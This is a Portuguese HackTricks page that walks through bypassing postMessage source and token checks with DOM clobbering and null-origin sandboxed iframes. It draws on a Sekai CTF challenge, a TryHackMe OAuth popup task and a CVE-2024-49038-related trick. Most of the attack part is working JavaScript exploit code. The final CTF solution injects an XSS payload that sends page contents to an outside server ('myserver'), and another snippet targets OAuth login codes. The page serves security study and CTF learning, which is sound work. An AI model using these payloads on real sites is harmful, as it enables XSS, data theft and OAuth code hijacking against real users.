Bypassing SOP with Iframes - 2

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Iframes in SOP-2

Na solution para este challenge, @Strellic_ propõe um método similar ao da seção anterior. Vamos ver.

Neste desafio, o atacante precisa bypass o seguinte:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Se o fizer, ele pode enviar um postmessage com conteúdo HTML que será escrito na página usando innerHTML sem sanitização (XSS).

A forma de burlar a primeira verificação é tornar window.calc.contentWindow undefined e e.source null:

  • window.calc.contentWindow é na verdade document.getElementById("calc"). Você pode clobber document.getElementById com <img name=getElementById /> (observe que Sanitizer API -here- não está configurada para proteger contra DOM clobbering attacks em seu estado padrão).
  • Portanto, você pode clobber document.getElementById("calc") com <img name=getElementById /><div id=calc></div>. Então, window.calc será undefined.
  • Agora, precisamos que e.source seja undefined ou null (porque == é usado em vez de ===, null == undefined é True). Conseguir isso é “fácil”. Se você criar um iframe e enviar um postMessage a partir dele e imediatamente remover o iframe, e.origin será null. Veja o código a seguir
let iframe = document.createElement("iframe")
document.body.appendChild(iframe)
window.target = window.open("http://localhost:8080/")
await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
document.body.removeChild(iframe) //e.origin === null

Para contornar a segunda verificação sobre o token é necessário enviar token com valor null e fazer com que window.token tenha valor undefined:

  • Enviar token no postMessage com valor null é trivial.
  • window.token é definido ao chamar a função getCookie que usa document.cookie. Note que qualquer acesso a document.cookie em páginas com origem null gera um erro. Isso fará com que window.token tenha valor undefined.

A solução final por @terjanq é a seguinte:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open(
'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
)

function start() {
var ifr = document.createElement("iframe")
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = "allow-scripts allow-popups"
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr)

function hack() {
var win = open("https://obligatory-calc.ctf.sekai.team")
setTimeout(() => {
parent.postMessage("remove", "*")
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage(
{
token: null,
result:
"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
},
"*"
)
}, 1000)
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = (e) => {
if (e.data == "remove") document.body.innerHTML = ""
}
}
setTimeout(start, 1000)
</script>
</body>
</html>

2025 Null-Origin Popups (TryHackMe - Vulnerable Codes)

Um task recente do TryHackMe (“Vulnerable Codes”) demonstra como OAuth popups podem ser sequestrados quando o opener vive dentro de um iframe em modo sandbox que só permite scripts e popups. O iframe força tanto ele próprio quanto o popup a terem uma origem "null", então handlers que verificam if (origin !== window.origin) return falham silenciosamente porque window.origin dentro do popup também é "null". Apesar do navegador ainda expor o location.origin real, a vítima nunca o inspeciona, então mensagens controladas pelo atacante passam sem impedimentos.

const frame = document.createElement('iframe');
frame.sandbox = 'allow-scripts allow-popups';
frame.srcdoc = `
<script>
const pop = open('https://oauth.example/callback');
pop.postMessage({ cmd: 'getLoginCode' }, '*');
<\/script>`;
document.body.appendChild(frame);

Conclusões para abusar dessa configuração:

  • Handlers que comparam origin com window.origin dentro do popup podem ser contornados porque ambos avaliam para "null", então mensagens forjadas parecem legítimas.
  • Sandboxed iframes que concedem allow-popups mas omitem allow-same-origin ainda geram popups travados para a origem null controlada pelo atacante, dando a você um enclave estável mesmo nas builds do Chromium de 2025.

Source-nullification & frame-restriction bypasses

Relatórios da indústria em torno de CVE-2024-49038 destacam duas primitivas reutilizáveis para esta página: (1) você ainda pode interagir com páginas que definem X-Frame-Options: DENY lançando-as via window.open e postando mensagens assim que a navegação se estabilizar, e (2) você pode brute-forcear checagens event.source == victimFrame removendo o iframe imediatamente após enviar uma mensagem para que o receptor veja apenas null no handler.

const probe = document.createElement('iframe');
probe.sandbox = 'allow-scripts';
probe.onload = () => {
const victim = open('https://target-app/');
setTimeout(() => {
probe.contentWindow.postMessage(payload, '*');
probe.remove();
}, 500);
};
document.body.appendChild(probe);

Combine isso com o truque de DOM-clobbering acima: uma vez que o receptor vê apenas event.source === null, qualquer comparação com window.calc.contentWindow ou similar entra em colapso, permitindo que você envie malicious HTML sinks através de innerHTML novamente.

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks